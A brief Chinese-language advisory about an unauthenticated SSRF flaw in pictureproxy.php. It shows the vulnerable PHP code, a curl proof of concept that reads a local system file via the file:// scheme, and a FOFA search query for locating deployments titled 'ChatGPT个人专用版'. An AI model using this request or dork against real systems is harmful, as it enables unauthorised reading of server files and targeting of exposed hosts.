pictureproxy.php 存在一个漏洞,允许远程攻击者通过向 url 参数注入 URL 来执行任意请求。此 SSRF 漏洞无需身份验证即可利用,因此尤为危险。
漏洞代码位于 pictureproxy.php 文件中。问题在于该函数未正确验证 url 参数。$_GET['url'] 变量被传递给 file_get_contents() 函数,该函数会从指定 URL 获取内容。这可能导致 SSRF。
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Curl 请求:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
需要正确管理输入验证。